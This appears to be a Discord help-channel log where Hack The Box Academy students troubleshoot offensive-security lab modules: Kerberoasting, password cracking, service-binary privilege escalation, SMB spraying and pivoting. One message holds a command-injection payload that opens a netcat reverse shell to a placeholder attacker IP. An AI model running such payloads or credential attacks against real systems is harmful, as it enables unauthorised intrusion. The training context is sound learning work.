#modules
as safe as any other website
it'd really be on your IT team to deem if it's okay or not accessing HTB from company resources
could be an ad blocker
Man, the "getting started" module is hard lol.
it's only uphill from there. prepare yourself
Don't worry. It gets harder.
Be able to get in the mindset of "did I read everything"
I'm tired, gonna go out to eat...
You think I didn't try? I contacted them, but they are smoking something weird there, I don't know.
Well we won't hack your account back
Ok then thank you for your time
Reaching out to Steam is your only recourse
You mean speaking with staff or something?
Reaching out to legitimate steam support
They're a neonazi btw or at least trying to be edgy with their profile
Do you have a link or something because i only speak with a bot on a email
Nope
I switched to Firefox when this happened, it didn't fix it, then I just reset my PC, got on Firefox and found the Academy tab.
I'm struggling to progress in the Windows attack and defense module. I tried running the Rubeus application through the command prompt, but it failed; the application seemed to start but then immediately closed. Has anyone else encountered this issue? (I am trying to open it after launching RDP.)
can you show a screenshot of the command and error
no error message and the command I used is start C:\Users\bob\Download\Rubeus.exe
you don't need to do start
it's a precompiled binary
you can just call it normally
also
i think it's Downloads not download
but i could be wrong
looks like it's silent erroring and not telling you file not found
Do you have any prior experience with the cmd? @daring totem
no error message for this either and I used start C:\Users\bob\Downloads\highway_to_hell-master\Rubeus,exe
yeah I spelt downloads on the previous message wrong but I did type it in with the s at the end like you mentioned
is that the filepath
also .exe not ,exe
it's likely silent erroring on you
meaning no feedback on if it's working or not
do this: cd to the downloads directory
cd to the directory that Rubeus is in
do ./Rubeus.exe
alternatively you can start it without using the start command
For the Attacking Common Applications Skills Assessment 1, I'm having trouble figuring out how the correct CVE or searchsploit or msfconsole option is found.
I tried
Did not work, just gave some code from one of the pages that was useless.
Tried a couple of others but nothing was useful even though it was matching the exact version.
Then in the walkthrough they just pull a random CVE out of the hat and it works?!
Frustrating. I feel like the portion of finding out which exploit to use either wasn't covered, or the expectations were not clear as to how many different options would have to be tried first.
Well, reverse it - look at why the exploit they chose was right
perhaps they used an exploit that wasn't for a specific version rather a range of versions < N
I have no idea, they used completely different gobuster methodology than in the module too.
Glad these walkthroughs are here now otherwise I would be sifting for a while for the right exploit
is this a common issue?
There are over 30
The enumeration led me specifically to a shortlist in searchsploit, but none of them worked. Searching in metasploit only pulled up one which did not work. The one used in the walkthrough seems like it was picked out of a hat.
That's fine I'll just roll with it.
I just wish they explained how they got there since it wasn't in the module
I'll help you find where the tool is located.
Have you just tried doing .\Rubeus.exe kerberoast /outfile:spn.txt in the Downloads folder?
.\Rubeus.exe kerberoast /outfile:spn.txt in Powershell
or
Rubeus.exe kerberoast /outfile:spn.txt from CLI
both work. But not too sure on what he is actually doing to run Rubeus since they have not posted screenshot
I suggested that earlier to them
yeah i saw
Seems like he just jumped from zero experience to a somewhat advanced topic.
time to do AEN BLIND 
Good luck
Hey guys, it says the target is spawning but I have been waiting for 20 minutes and it's still spawning. Does anybody have the same issue?
same
same here
use EU 2 vpn
Write a report while you're at it!
Refresh the page? Try a different VPN?
it spawned eventually, but took quite some time
thanks
Hi guys, I'm doing the windows os module and on the question that asks "Find the non-standard directory in the C drive. Submit the contents of the flag file saved in this directory." what exactly does that mean? I put in the command that lets me see the tree of folders and files and I know what file the question is talking about but idk how I'm supposed to submit contents of it
Standard directories would be Windows, Program Files, Users, etc. So which directory isn't supposed to be there by default?
That would be Academy right?
Are you asking or did you look?
Well there you go.
Cool remove the spoiler 😉
But when I submit it I get told it's incorrect
Hi, I'm in the module WINDOWS EVENT LOGS & FINDING EVIL,
section Analyzing Evil With Sysmon & Event Logs,
question 1.
I already followed the steps to replicate the DLL hijack with calc.exe and reflective_dll.x64.dll, and it works: it shows the mainDLL popup,
but in my Event Viewer it doesn't trigger event ID 7.
make sure no extra spaces etc
Make sure you modify the sysmon config as explained in the section
ah, ok
yeah I got it thanks both you and gubarz

Hey guys, currently on the Introduction to Malware Analysis module, debugging section. There are some resources we need to download on our host because they're not in Pwnbox or the target Windows VM. How did you transfer those resources from your host to Pwnbox and then to the target Windows VM? Copy-paste or drag-drop doesn't work on my end.
can't pwnbox reach the internet and download it directly there?
Hi. I've got a question related to the Password Attacks module.
On the page I've linked, they've mentioned two modes within John the Ripper: Single Crack Mode and Wordlist Mode. Under Single Crack Mode they mention the --wordlist option, as well as the --rules option. These two options are once again mentioned under the Wordlist Mode.
I'm struggling to see the difference between the two modes. Is there really a difference? If so, could you please explain?
Thank you 🙂
Was there something specific or just in general?
files are not hosted on a website, it's in the resources section of the module
the module is on a website though?
Gotcha. Gonna log in to my Hack The Box account on Pwnbox. You could've said that directly, it would have been clearer to understand. Thanks.
Well I didn't know it was the resources from htb
are you trolling?
the --wordlist argument allows you to choose a wordlist file. the --rules argument applies rules from a file that contains rules for john to follow.
No. Your original message never said it was from the resources section of HTB, it just said you had to download some resources so I didn't connect the two together.
Hi. Yes, I've understood what the flags do, I'm just wondering if there's a difference between the two modes since the two options (wordlist and rules) can be used with both.
Those are two arguments that can be used while using the single crack mode.
According to the section, they can also be used with Wordlist Mode.
I said it right after
actually nm
re-reading this i'm wrong, single crack mode appears to just use the built in wordlist for john
it's wordlist mode that uses the wordlist, and then there's incremental mode
tbh i've never used the built in list
I see, so the only real difference between the two is that Single Crack Mode uses a default wordlist but allows you the option to specify a custom wordlist, whereas Wordlist Mode requires you to specify a wordlist?
i pretty much use wordlist mode
that seems to be it
but wordlist mode also allows you to apply rules
not sure if it can be done in single crack mode based on what module
ohhhhhh i see
the rules for john works different than hashcat
it just mangles the passwords so it probably can be used with single crack mode
Could you please clarify if my understanding on Incremental Mode is correct?
Incremental Mode tries every possible combination of a specified charset? And if not specified, it uses the default charset (a-zA-Z0-9)?
it will increment all characters. For example it will start with AAAAA, then go BAAAA, CAAAA
... ZZZZX, ZZZZZ
it increments through all characters
extremely time consuming, essentially brute forcing the password
So if the password is 8 digits, does it start from just one digit first, tries everything, then moves onto two digit combinations and so on?
Until it's tried all possible 8-digit combinations using the charset.
yeah looks like it'll try all possible characters from the set
Thanks for your help.
so better than a pure brute force
Incremental mode generates the guesses on the fly, while wordlist mode uses a predefined list of words. At the same time, the single crack mode is used to check a single password against a hash
that kinda sums it up
then the --rules will apply extra rules, for example it may replace A with @
or E with 3
Sorry, but how is it better than poor brute force? Is it because it increments from smallest to largest and not randomly?
no because a brute force attack is completely blind and just starts from zero incrementing up. john takes characters from the charset
so the charset will probably have fewer characters inside of it, while a brute force uses all characters possible
honestly the john page probably can explain it all better and more accurately https://github.com/openwall/john/blob/bleeding-jumbo/doc/MODES
and here's more about the rules https://github.com/openwall/john/blob/bleeding-jumbo/doc/RULES
I see. Thanks a lot.
i went to your youtube and tbh it's kinda bad. some of your videos also have watermarks as if you stole them instead of making them yourself.
nah
my videos only
any hacker is here?
even your logo is stolen
module : Injection attack
skill assessment
I have found internal hosts running on target through /etc/hosts
but don't know how to access it
i took the model but i keep my name
uh huh
and your youtube videos where you stole videos that have watermarks along with 'your' logo? got an excuse for that one?
<@&861185840277487616>
Hi,
I am doing Medium lab of "Attacking Common Services". I managed to find 5 open TCP ports.
Out of them, I tried anonymous login, default credentials and password bruteforcing(using user list and password list provided in the Resources section) for FTP server but failed.
I have got the zone file from the DNS server but that is not much help.
I tried enumerating the usernames in POP3 server, but it gives OK response even for the wrong usernames. I tried bruteforcing the password using hydra, but I get ERR Disconnected for inactivity during authentication. error after a while.
I checked the forum and it says that we should be able to find 6 open TCP ports. I tried resetting the machine and waited for 5 minutes before scanning again. But all I get is 5 ports. I am now running nmap full port scan(-p-). However, over time it shows increasing trend of remaining time. It currently shows 2:10:25 remaining. Am I missing something? What am I doing wrong?
What's your nmap command?
https://academy.hackthebox.com/module/112/section/1078
Footprinting Lab - Easy
Not sure whether I am correctly connected. Tried switching VPN. Any ideas? Shouldn't there be at least some ports available?
I am using the following command:
nmap -v --disable-arp-ping -n -Pn -p- {target_ip} -oN full.nmap
Make sure your IP is correct and that you're connected to the VPN. Try restarting the lab. Try switching to a different VPN.
You running that with sudo/root?
Nope
Give that a try or adding -T4
also try using the EU servers
I am using the pwnbox with lowest latency:
I see Increasing send delay for 10.129.47.248 from 5 to 10 due to max_successful_tryno increase to 6 messages in the verbose output of nmap and while overall remaining time for nmap has decreased after using -T4 flag, there is still increasing trend in remaining time:
I'm referring to the vpn servers, that's where the target actually spawns at
Oh. I am currently using EU-Academy-1
hmm if the scan is still wrong, switch the pwnbox server to EU too so that the latency between pwnbox and the target will be the lowest
The remaining time is decreasing right now. So, I will just wait a little and see how that goes. Thanks for the help!
I'd try to keep the two geographically as close as possible
I buy cubes as I complete the modules and need more. I do not have student subscription. So, no hints🤐
Hints aren't for every question and they are still there. The walk through which is barely a couple weeks old has always only been for annual subscriptions.
Thanks it worked - I cannot seem to progress with the task.
I've tried the following:
||Full Nmap port scan, found 4 open ports (21, 22, 53, 2121)
- Tried anonymous login on 21 and 2121
- Tried logging in with the user:pass provided on 21 and 2121 - no files on the ftp server.
- Tried connecting on port 22 using the provided credentials - Permission denied (publickey) -> tried with -o PreferredAuthentications=password but it didn't make a difference.
- Tried enumerating DNS zones and doing zone transfers to int.inlanefreight.htb (and others) but without luck.
- Tried numerous other enumeration on the ports||
What could I possibly have missed?
Determine the IP address of the C2 (Command and Control) server and enter it as your answer. I can't figure out what artifacts I should be looking for here. Can anyone give a hint?
Reread what might be the obvious way forward, maybe you'll get what you need all at once.
How would you pull stats for an IP and which direction do you want?
@fathom pendant pls help here
I am totally stuck
Morning buddies
i tried netstat got nothing
I'm not sure how netstat is related to the question when Splunk is provided.
velociraptor it's not related to splunk ( DIGITAL FORENSICS)
Ah, thought you were on a different question that uses splunk or maybe it's elastic. It's late and I don't have those notes on me.
where I can find Linux attack machine ip (MS01) to use for solving the lab? https://academy.hackthebox.com/module/143/
Is it a good one? How long on the project did it take to find?
i hope it's a good one. took me some hours
Best of luck it's not a dup!
Hello gentlemen!
When I try to upload a .json file into BloodHound, all files upload except this one.
Any idea why I am having this issue?
.\sharphound.exe -c all
The latest sharphound does not work with “older” bloodhound and this is the error you get when you combine them. Use a older sharphound collector (<2.0) or a newer bloodhound
If you start sharphound it tells you for which version it is
you're using the legacy version, the newer sharphound is only compatible with the community edition
no one? author says that a parrot and a windows machine are provided to the user to connect using xfreerdp, but I can't find ip
It depends
... because it's just an info section and there's nothing to attack, you'll get the ip in the following sections once you spawn the targets
One of the sections details that some scenarios have a parrot box on 172.16.5.225 if I'm recalling, but they'll tell you that
Hi, sorry if this is not the right place to ask, but I need help with the Dante Pro Lab. Not so much with cracking it (I'm 25% through at the moment) but more wondering why it is that I have to go back and repeat steps (or does everything have to be re-done if someone resets the lab?). What channel / where can I ask this? The interface of the Discord isn't particularly clear. Also, are the labs suffering from connectivity issues at the moment? I can't get anything working.
Read and follow #welcome , there's a #prolabs-dante channel you can access after
thanks!
Windows Priv Esc - Citrix Breakout (can't connect to target).
I've logged in to the portal using the pmorgan credentials, but when I try to connect to the virtual desktop I get an error saying that "an error occurred while making the requested connection." I downloaded the linuxx86 zip file when I first visited the site, but I was wondering why I can't connect. I've seen there's a launch.ica file that I might have to have, but I can't find it amongst the extracted files. If anyone could help I'd greatly appreciate it.
i'm answering this question because using parrot instance on web I can't reach 172.16.5.0/23 target
Well no
You connect to the 10.129.x.x target
Then either pivot or connect through that target
You don't have direct access to that subnet just from the vpn/pwnbox alone
Note: Double click on .ica file to open with Citrix Receiver Engine.
[Encoding]
InputEncoding=UTF8
[WFClient]
CPMAllowed=On
ProxyFavorIEConnectionSetting=Yes
ProxyTimeout=30000
ProxyType=Auto
ProxyUseFQDN=Off
RemoveICAFile=yes
TransparentKeyPassthrough=FullScreenOnly
TransportReconnectEnabled=On
VSLAllowed=On
Version=2
VirtualCOMPortEmulation=Off
[ApplicationServers]
Default $P5=
[Default $P5]
Address=10.13.38.15:1494
AutologonAllowed=ON
BrowserProtocol=HTTPonTCP
CGPAddress=*:2598
ClearPassword=E362BFFF6FD12E
ClientAudio=On
DesiredColor=8
DesiredHRES=640
DesiredVRES=480
DoNotUseDefaultCSL=On
Domain=\08532F0AC3339E9B
FontSmoothingType=0
InitialProgram=#Default $P5
LPWD=15
LaunchReference=441882447C2E5E7351AEC1C6F450B2
Launcher=WI
LocHttpBrowserAddress=!
LogonTicket=E362BFFF6FD12E08532F0AC3339E9B
LogonTicketType=CTXS1
LongCommandLine=
NRWD=1123
ProxyTimeout=30000
ProxyType=Auto
SFRAllowed=Off
SSLEnable=Off
SessionsharingKey=-0gdQzE/Jw88B6/WlHfcfzD
StartIFDCD=1711008070667
StartSCD=1711008070667
TRWD=15
TWIMode=Off
Title=Default
TransportDriver=TCP/IP
UILocale=en
WinStationDriver=ICA 3.0
[Compress]
DriverNameWin16=pdcompw.dll
DriverNameWin32=pdcompn.dll
[EncRC5-0]
DriverNameWin16=pdc0w.dll
DriverNameWin32=pdc0n.dll
[EncRC5-128]
DriverNameWin16=pdc128w.dll
DriverNameWin32=pdc128n.dll
[EncRC5-40]
DriverNameWin16=pdc40w.dll
DriverNameWin32=pdc40n.dll
[EncRC5-56]
DriverNameWin16=pdc56w.dll
DriverNameWin32=pdc56n.dll
Are you experiencing problems with lab connectivity?
yup, getting "Request Validation Failed" every time I try launching an instance.
it launches the instance correctly and gives me IP, but when I launch an ICMP packet I have no connectivity.

oh wow, well you're getting further than me
jajaja
Which VPN are you using?
Some targets may not respond to pings
even if I run an nmap scan it doesn't work either.
Are you using the -Pn flag?
I've tried several just incase the VPN maintenance was the issue
I am asked to apply port scanning with nmap
Try EU?
yu[
I am using EU
I tried UK
Good point
Eu-academy-1
I mean I was trying to pwnbox... didn't feel like logging in on my kali box. I'll try connecting to another VPN on my Kali box.
sorry but I've tried installing it but I still can't find the the .ica file. Is it already on the linux host? I tried using find cmd to search for it and nothing came up
You double click the .ica file on the host you connect to, not on your own box. If the .ica file doesn't exist you can create your own using the code I posted.
That module and that ica connection is shaky. I had to respawn that module a lot to finish studying it.
So you don't need to install anything.
your box->spawned machine->.ica connection to target
Hello! I am currently doing section "Protected Files" of "Password attacks" module. It requires to use ssh2john.py script, which does not work with the python version installed in pwnbox (python - 3.9.2).
Please update ssh2john.py to the latest version (i just downloaded the latest from github).
I'm really sorry, but I made the .ica file and tried connecting, and it just hangs. I looked through the file and it's not like I need to change the IP of the Windows machine I'm trying to connect to.
Still no labs working?
Try respawning the machine, waiting a few minutes for it to do it's slow ass loading on the backend, double click the ica, and then wait a while. It's slow af.
alr, I appreciate your patience
If this doesn't work poke support.
👍

<@&861185840277487616>
try eu2, there were some network problems with the US vpns
gotcha
I have tried eu 1 and eu 2 and it doesn't work....
how do i use hack the box from ubuntu
Download vpn
how
Log into your account
Click download vpn
i have
via VPN, just like any other VM
aight
sudo openvpn ./yourvpnfile.ovpn
https://academy.hackthebox.com/vpn for academy
Or the "connect to htb" button in the top right of the main site
Hey I am doing Windows Privilege Escalation > SeDebugPrivilege and towards the end of the page they recommend to use the SeDebugPrivilegePoC from https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC But I don't really get how to use this. Do I have to compile the poc into an exe or how do I make it into some kind of application.
Some googling led me to this repo where someone has compiled it. https://github.com/Sentinal920/Pentest-Tools/tree/master Would still like to know how to do this myself.
Probably with vscode
Or some other compiler
yeah probably, but that's for an other time
I'm unsure if anyone else has used this for the module /158/section/1427, creating a reverse shell through Reverse Port Forwarding on the Windows host.
Using Invoke-WebRequest for me didn't work and I tried quite a few other file download requests and none seemed to download from the ubuntu server.
Instead of wasting time on web requests, on the Windows host I used Internet Explorer, added the Ubuntu web server address into the "Trusted Sites" settings for IE and I could download the payload file no problem.
Just thought I'd share that in the event some people have struggled with that section
i can't find this in new CE bloodhound
is there no 0x0410 in list of process security rights? is it typo of 0x0400?
this is from YARA & SIGMA FOR SOC ANALYSTS section Developing Sigma Rules
https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
am i missing something here or is it combining flags or
i'm very confused i bitwise OR 0x0400 and 0x0010 it is 0x0410
where is 0x1010 coming from? it claims it's a combination of both but I don't see how it results in 0x1010

Module Windows Privilege Escalation / Weak Permissions: what is the problem when we look at the screenshot?
did you stop the service before replacing its file? sometimes it breaks if you didn't
i will try it again
Does anyone know why this happens?
findstr /SIM "Password" *.xml
FINDSTR: Out of memory
Back to my problem: module Windows Privilege Escalation / Weak Permissions. Is it right that you have to make the malicious binary yourself with msfvenom and then you replace it, right...?
Yes, you have to make a binary with msfvenom and then copy it to replace it with the legitimate one.
Alright. When I do that, I can't start it again.
i have always:
sc start SecurityService
[SC] StartService FAILED 1053:
Once you do that, if you start the service again it should run your binary
Even if it gives an error, it should be executed if it is correctly replaced.
🤨
if you can get PowerUp in there, it will replace the binary with one that adds a user into the admin group so you could RDP with it
i see this error but the user gets added
you're trying to find an xml file containing the string password in the whole file system, that's a lot of files to go through so it ran out of memory
but something does not work...
you added a user? oh, you're in the admin group
your command prompt must be run as admin
Oops, thanks, forgot to run it with admin privs
aa okey
Pulling PowerShell "Get-ChildItem" if it works
Hey, I'm currently on the Shells & Payloads module in "The Live Engagement" section. I managed to get host 1, but only after looking at the hint. I could not find the credentials for the life of me, and I tried running default credentials for Tomcat but that did not work, and I can't understand how I was supposed to find those credentials.
Hi, great day to you all. I am having issues with a room; I think it's a very silly mistake on my part, but I cannot solve the Linux Fundamentals question where it asks "How many total packages are installed on the target system?". Could you please advise?
I had a lot of pain in that module because I was using the VPN and everything I was trying failed. The reason was the connection: when I tried from the Pwnbox everything worked. I don't know if that could be your case.
should be on the desktop or one of the config files
what command are you using to find the packages
thats the thing, i don't even know how to look for them, i was using find and locate
google "ubuntu list installed packages"
Maaan are you serious! How did I miss that lmao
They should probably tell you that you have the credentials on your desktop cause wow I lost way too much time on this lol
I mean, it is in the hint 
True but I did waste a bunch of time before checking the hint lol
ty, dumb me was so focused, i forgot google,
Hi All, I'm trying to redo the Pass the Ticket using only Rubeus. I can dump the ticket since it shouldn't require any extra privilege. When I try to run Rubeus ptt /ticket etc. to load the dumped ticket, I get a permission denied. Is that expected? I'm already local admin.
Can someone please help me with my Instagram account! That's very important!
Hi all,
Do any of the 3 skills assessment labs at the end of the Password Attacks module require using credentials from previous labs in the password attacks module?
no
Took me an hour before i took a step back and questioned why they gave us the 4th machine and if maybe there is something on it
how come Intro to Web Apps comes before Web Requests in the Infosec Foundations path ?
but then if you read the description of the Web Apps module, you are supposed to do Web Requests first no ?
No
No
scam much ban his ahh
Message support idk
how do i get to post images and get access to general in the server
verify your account bruddhah #welcome
ty
If my user htb-student is in child.inlanefreight.ad domain , but it belongs to *Svc_Admins * group in the parent domain inlanefreight.ad , does that mean I am DA on inlanefreight.ad ? Or what does Svc_Admins group do?
I've tried everything since yesterday night (VPN switch and waited for a long time) and the Citrix instance still isn't spawning. I can spend more time debugging, but if it's a known issue, then I'll just skip it for now.
From what I've seen, people can't connect on the USA VPNs.
They went to eu and it worked.
ok, i am trying apt list --installed | wc -l, so it tells me how many packages are installed, but still says wrong answer
I may be omitting something
run it without wc -l and look at the first few lines, notice anything extra?
Or replace wc -l with head and see what's going on
yup, it's a red team cert
yes exactly lol, that's what i ended up doing. thxs!
Apparently they're doing some changes in the backend, should be done in a couple of days hopefully
gotcha, it's no big deal
I am on EU Academy 1. This VPN doesn't seem to work. How can I fix this?
I take it when you switch vpn regions you.
- close current connection attempt
- delete old file
- download new file
yes. I replace the ovpn file
I think I should stick to pwnbox while they fix the issues
am I supposed to email or there is a channel for that?
Need to speak to a person? Learn how to reach our support via HTB Labs.
There is no dedicated support on discord
okay thanks
Hi, I'm doing ATTACKING COMMON SERVICES, Attacking SMB
Question 2 "What is the password for the username "jason"?"
I have done this one "crackmapexec smb 10.129.203.6 -u jason -p pws.txt --local-auth" but I don't understand what I am supposed to do. Help me please.
Looks right to me
What exactly isn't working?
You're not providing any errors for us to work with
Is there a way / place to ask for a review of module content? I did the DACL II module and the GPO Attack section on Linux shows a tool called GPOwned; the author said no tool on Linux right now can create / link a GPO. I made a PR to this tool that got approved and enables both creation and linking.
I also advise adding | grep "+"
When i do it I do not get any correct answers?
looks like this all the way
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:12345qwert STATUS_LOGON_FAILURE
Well
The [-] means negative/failure
So by grepping for + or doing an inverse grep for STATUS_LOGON_FAILURE will only show the positive results
I got the 10.129.203.6-GGJ_id_rsa on my desktop but when i try to ssh I get the Permission denied (publickey).
Do i need to input it somehow?
This right "chmod +wx 10.129.203.6-GGJ_id_rsa"
Nope
You need to make it so only you can read the file
I'd look into octal notation for file permission
owner | group | other
r(read) = 4
w(write) = 2
x(execute) = 1
add together for file permissions
744 = everyone can read, only owner can edit/execute
Is it the permission for 10.129.203.6-GGJ_id_rsa I need to fix?
I think it's chmod 400
but I don't get it to work
also tried 600 but it didn't work
Any number +00 should work
Also make sure it's the right user you're trying to ssh to
i did chmod 600 10.129.203.6-GGJ_id_rsa
then ssh jason@10.129.203.6 -i 10.129.203.6-GGJ_id_rsa
not working
"Not working"
That's not descriptive
Is it giving an error of some sort
Is the target still alive?
I take it you did get <file> when you downloaded it
I'd try redownloading the file and trying again
for the skills assessment in sqlmap essentials, is there supposed to be a clue in how the website reacts to when i send a specific string to know what sqlmap tamper scripts to use
I don't get how to get the file
does it give an error when you try to get the file
we talk about smbmap right?
for this
If you connect with smb it's as simple as going into the share folder and doing get file
along with what @fathom pendant just said, this may help explain things:
smbclien.html
I'm looking for it but I really can't find any way to use get with smbclient
Is it possible to mount /TechSupport from a specific port or doesn't that matter? I'm unable to view/open the currently mounted drive.
when I do the command smbmap -H 10.129.203.6 -r "GGJ/id_rsa" i get the file onto my desktop
is that wrong?
On password attacks networks services how did u guys fix the smb invalid reply from target error
also trying this but not working
smbclient -U jason ////10.129.198.209//GGJ
Password for [WORKGROUP\jason]:
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)
@inner geyser @fathom pendant
try backslashes
For forward slashes you don't need to double up
It's either \\\\ip\\share OR //ip/share
The reason is because \ is an escape character
\\ reads it as a single \ and discord even uses it as well (this is double \)
can someone help with this
No idea i just fucked around and used what was given in the module to mess with
It's a combination of techniques
did you have to use several tamper scripts together
I really don't remember, I didn't take many notes on this module as I usually do. Need to go back and add notes
I remember prefix and some other stuff
It was like prefix, tamper, and technique that were used
i got the flag but now its not accepting it
Try making sure no extra white spaces
did that
if you have the correct flag, it will accept it
so you either didn't input it correctly or you don't have the flag
Or the flag is being output weird
figured this out by using udp vpn file instead of tcp.
Module: File Inclusion
Section: Skill assessment
I have Fuzzed everything and I haven't found a way to get file inclusion or path traversal. I am curious about the contact page because that's the only way I can input. Can some one give me a hint?
I would guess something to do with it trying to add to the administrators group on the child domain instead of the parent domain, because in your screenshot htb-student is a part of child.inlanefreight.ad and you're trying to add a user to the inlanefreight.ad domain. I haven't done this module so I have no idea and someone else can probably provide a better answer, but I don't see anything in your commands telling it to add the user to the parent domain's group.
You may want to review the local file inclusion section. You're looking for a page that has a parameter at the end where you fuzz/modify the value.
Click on all links on the page until you find a parameter being input
Ok I think I have all of them that have parameters will check again
I wonder if I'm digging too much
you might be, it's kinda surface level
just click all the links and keep an eye on the url where you may be able to change the value of a parameter
ok
No, you don’t. You only have to use between. You always wanna start from the base and work your way up so first try nothing at all and then try it with a tamper script or anything else that was mentioned in the module
Is there a linux equivalent of the "Windows Event Logs & Finding Evil" module?
On the Attacking Common Applications Skills Assessment II, the vhost is not resolving to the ip, even though it is in my /etc/hosts file
They give the ip and
show a screenshot of your /etc/hosts and the victim ip
But the IP is the only thing that actually opens any site, the gitlab.inlanefreight.local doesn't work
Should I reset?
Also, it's asking for the URL of the Wordpress instance, there wasn't any wordpress instance.
type nslookup gitlab.inlanefreight.local and show me the results
or just getent hosts gitlab.inlanefreight.local
you can even just do a simple ping to make sure it's resolving, most likely it is and it's something else
dig gitlab.inlanefreight.local +short
Now I see what the problem is
I should have been using inlanefreight.local, not gitlab.inlanefreight.local
I checked the walkthrough for the part about the Wordpress since there was no wordpress and I apparently need to use gobuster?
I don't remember what section that was in
what the ffuf
Yeah, I've used it plenty, I like it more than ffuf, I'll just have to go back and find where that is in this module
I only have gobuster in my notes for tilde enumeration and the Tomcat section
Nothing saying I need to fuzz for vhosts!!!
Nothing for ffuf in this one
I'm stumped.
I don't want to just follow the walkthrough for this one.
Okay so even the walkthrough isn't accurate, I checked the fuzzing command and it's not giving me the expected output
This is the full list
The wc is almost 5000
¯\_(ツ)_/¯
Distinguishing between creating and adding a user is important. GenericAll over a group allows you to directly modify group membership of the group so you can add a user into that group. However, you cannot create a new user into the domain with this right.
Additionally, this is considered as a spoiler for other students, so it’s advisable to remove it.
Thanks, posted to erratum
fyi i was able to access gitlab.inlanefreight.local without issue only adding that to my /etc/hosts file
so could be their instance is bugged
it's possible, but he didn't run the command to see if the host resolved which was the initial problem. accessing the website is another thing, it doesn't run on port 80 for example.
but as long as the host is in /etc/hosts it should resolve to that ip you set, unless something is wrong with your box
the beginning of the module also says it will use several vhosts throughout the module which should be in /etc/hosts https://academy.hackthebox.com/module/113/section/1087
which includes the blog site
It's acting strange, I have it in my /etc/hosts, but I have to manually enter the port
mine redirected automatically. using firefox
holeeeeeeey moley
It's defaulting to 8081, when the nmap scan showed 8180
It automatically tacks on the 8180 for some reason
I mean 8081
When I manually enter 8180 it works fine with either the ip or the gitlab.inlanefreight.htb
weird
I tried resetting and it's doing the same weird thing with the port
¯\_(ツ)_/¯
i'm pretty sure the gitlab instance is on port 80
i didn't do anything special for that url
i could be misremembering what i did a few mins ago though haha
This is what I get when I put in 8180 manually
It automatically goes to the sign in page
ahh okay. i'm probably misremembering then.
oh yeah for the gitlab one yes, it wasn't on port 80
but it redirected me np
Okay, I figured it out, had to clear web cache
It's resolving correctly now
Still doesn't solve my gobuster issue
On Active Directory Attacks & Enumeration Skills Assessment 1, and can't figure out why one hash can be cracked and the other cannot. At first I thought it was an issue with hashcat/john versions on my machine, so tried it in PwnBox. Cracked the hash. So then I copied the hash from PwnBox to my machine, cracked the hash with hashcat. Both hash files look identical and I ensured no additional spaces were in either file using the following command:
echo 'insert hash here' | tr -d "[:space:]" > hash_to_crack_file
I can show a screenshot of the 2 hashes as a quick comparison but wasn't sure if that would be considered spoiler-y. Any ideas why my first hash is giving me a 'token length exception' error?
Your hash format is broken in some manner or you're using the wrong mode
Yeah i'm sure the hash is broken but considering I obtained the hash the same exact way in both instances and used the same mode, it's pretty irritating. I'll have to compare them line-by-line somehow
Hey guys, I'm curious. Is there a way to have access to a pivot host's network after another proxychain hop?
What do I mean by that:
Hosts:
A - Attack host
B - Pivot host
C - Target host
proxychains.conf file:
...
socks5 127.0.0.1 1080
socks5 127.0.0.1 1090
Logic: A ==tunnel with socks on 1080== B ==tunnel with socks on 1090== C
After creating the second tunnel and specifying the proxy in the proxy file, when I try to nmap back to the pivot host it shows me that it is down.
Is there a way so that I can always access hosts from each subnet? (assuming that all those hosts have their own)
sometimes nmap/ICMP doesn't work well through proxychains
You have access to C through B's proxychain. Are you trying to connect to network D that only C has access to?
**Windows Priv Esc Skills Assessment I**
I can get cmd injection with whoami, but when I try to use nc I can't get a request. I also tried using curl with an http server but that failed too. Here is the cmd I'm using. I'd greatly appreciate a little help.
|| 127.0.0.1 | nc PWNIP 1234 -e /bin/sh ||
You are on the right track but you are using Linux commands on windows box
trueeee I'm actually so dumb
Can anyone assist me, I don’t know what to do on how to pass this section
scroll down. any questions that you need to answer?
scroll down
there should be a "click here to spawn target" button
Yes i spawned the target
and above the first question should be instructions ssh to ip with username "username" and password "password"
SSH to the target using the provided command
reading the question will be more helpful to figuring out what you need to do
I am trying
neither of your screenshots have the question in them
the questions will be near where you spawned the target on the academy page
well look at that, instructions given above the first question to ssh
and the credentials to do so
also for q1 uname would be the tool/command used
not the answer
"doesn't work" isn't descriptive
well yes
I am sending a video
because
- you need to ssh to the target
- uname -a
your main issue is that you haven't done step 1) connect to the target
because Linux is the kernel
if you do man uname or uname -h you can see what other flags you can use to get more specific info
add -sT
or -T4
What is the best way to learn programming languages?
Metasploit module in Pentester path
Trying to exploit the SMB share and metasploit keeps exploiting it but not creating a shell / completing the exploit any hints as to what I'm doing wrong? set the RHOSTS to the box IP, SMBUser to the user and SMBPass to the password
user error: problem solved
blud doesn't know how password prompts work
it's normal for password prompts not to show the password as you type it
it's best to copy/paste
to paste into terminal; ctrl-shift-v
gonna be honest chief it'd be better if you just described the problem instead of taking 420p videos from your phone
it's actually 480
let's give the man some credit
oh oops i got it flipped it's 360p
i was mostly memeing with the funny number
ya i know 😛 just teasing you
Is anyone else having trouble spawning the targets? I'm trying for over 30 minutes to spawn the target from AD Enumeration & Attacks - Skills Assessment Part II. Yesterday was normal 😦
try changing vpn regions
I did this with US EAST and WEST VPN's, but nothing changed. Will give a try to CA...
Now spawned, i guess i needed to complain somewhere lul
the VPNs aren't labeled EAST/WEST that's pwnbox region
the VPNs are labeled us-academy-[1,2,3] or eu-academy-[1,2]
got it
how do i list services listening on interfaces, i used service --status-all, and systemctl list-unit-files --type=service
usually netstat is a good command to start with
man netstat will provide you the flags you can look for to get your info
i was also trying with netstat -all |grep Listen | wc -l
i would take off the wc -l part
as the answer specifically states to exclude certain interfaces i.e. ipv6
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only), this is the question, as far as i understood, is asking for all, not just those, am i confused?
just take off the wc -l portion and you'll see
you're still seeing all listening interfaces
just need to drop off certain ones
it's also asking specifically in this instance ipv4 only
it seems weird
but it's saying not localhost (127.0.0.0/::1) and ipv4 only so generally 0.0.0.0
well, are you connected to the target system? the commands MarcieLee gave you are for your local system, so they will only work if you're remotely connected already, otherwise you may need to run something like nmap to find what services are running on various ports.
i am connected on target via ovpn
